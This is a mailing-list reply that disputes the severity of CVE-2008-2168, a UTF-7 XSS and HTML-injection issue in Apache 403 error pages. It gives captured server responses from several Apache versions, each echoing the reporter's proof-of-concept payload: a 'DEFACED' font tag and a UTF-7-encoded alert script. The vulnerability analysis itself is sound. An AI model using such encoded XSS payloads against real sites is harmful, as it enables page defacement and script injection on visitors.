<<< Date Index >>>     <<< Thread Index >>>

Re: Re: Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability



re: "set 403 page's charset in the server side by writing it in your server 
code"

Apache *does* set the charset in the HTTP header.  It is set to iso-8859-1 by 
default.

Adding a <meta http-equiv> tag with the iso-8859-1 charset does not change the 
browser behavior.  See below for the captured response from a test with this 
change.

The user can still manually override the charset to UTF-7 via the browser menu, 
regardless of anything the Apache server sends.

re: "There is no problem to trick the victim and force him to change the 
encoding of his browser by little social engineering"

For the Apache 403 error page, the only opportunity to "trick" the victim is 
within the URL itself. It would be quite a feat of social engineering to do 
this within a URL, between the phrases "You don't have permission to access" 
and "on this server".

There are many possible malicious strings in UTF-7, and any sequence of 
character values less than 0x80 starting with a "+" is potentially a UTF-7 
string.  This is why it is not appropriate for browsers to automatically 
interpret text as UTF-7.  Preventing a user from manually overriding the 
specified charset and interpreting strings as UTF-7 is not something a web 
server can do. If you feel this manual function should be disabled in browsers, 
it may be better to let the browser developers know.

re: percent-encoding the "+" character in URLs

The "+" character is a reserved character in URIs per RFC2396 (see section 2.2 
Reserved Characters). RFC3986 goes further and explains why reserved characters 
like "+" should not be percent-encoded:

  "Percent-encoding a reserved character, or decoding a percent-encoded octet
   that corresponds to a reserved character, will change how the URI is
   interpreted by most applications.  Thus, characters in the reserved
   set are protected from normalization and are therefore safe to be
   used by scheme-specific and producer-specific algorithms for
   delimiting data subcomponents within a URI."

A previous writer has correctly noted that Microsoft recommends just the 
opposite: that "+" characters should be percent-encoded.

Below are the responses to your test URL from various versions of Apache 
servers on different platforms. Note that the iso-8859-1 charset is specified 
by the Content-Type header in all cases. The last example is with Apache 2.2.8 
modified to include a <meta http-equiv> tag in the body.  The behavior remains 
the same in both Firefox or IE with this change.

It is a problem for web server developers when a vulnerability is accepted and 
propagated with a description like:
"here is a malicious URL - the victim must perform these manual steps with it - 
We leave it to other hackers to upgrade the attack and make it fully automatic."

It is a disappointment that CVE-2008-2168 was accepted so uncritically.

Regards,
-tom-


====================================================================

HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:25:31 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 590
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access 
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ&lt;font
 size=50&gt;DEFACED&lt;!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
on this server.</p>
<hr>
<address>Apache/2.2.3 (CentOS) Server at www.example.com Port 80</address>
</body></html>

====================================================================

HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:37:17 GMT
Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g SVN/1.4.6 DAV/2 
mod_perl/2.0.4 Perl/v5.10.0
Content-Length: 510
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access 
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ&lt;font
 size=50&gt;DEFACED&lt;!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
on this server.</p>
</body></html>

====================================================================

HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:47:29 GMT
Server: Apache/2.2.8 (Debian) DAV/2 SVN/1.4.6 PHP/5.2.5-3 with Suhosin-Patch 
mod_python/3.3.1 Python/2.4.5
Content-Length: 666
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access 
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ&lt;font
 size=50&gt;DEFACED&lt;!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
on this server.</p>
<hr>
<address>Apache/2.2.8 (Debian) DAV/2 SVN/1.4.6 PHP/5.2.5-3 with Suhosin-Patch 
mod_python/3.3.1 Python/2.4.5 Server at www.victim.com Port 80</address>
</body></html>

====================================================================

HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 04:45:49 GMT
Server: Apache/1.3.33 (Unix)
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

23c
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access 
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ&lt;font
 size=50&gt;DEFACED&lt;!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
on this server.<P>
<HR>
<ADDRESS>Apache/1.3.33 Server at localhost Port 80</ADDRESS>
</BODY></HTML>

0

====================================================================

HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:53:10 GMT
Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g SVN/1.4.6 DAV/2 
mod_perl/2.0.4 Perl/v5.10.0
Content-Length: 583
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access 
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ&lt;font
 size=50&gt;DEFACED&lt;!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
on this server.</p>
</body></html>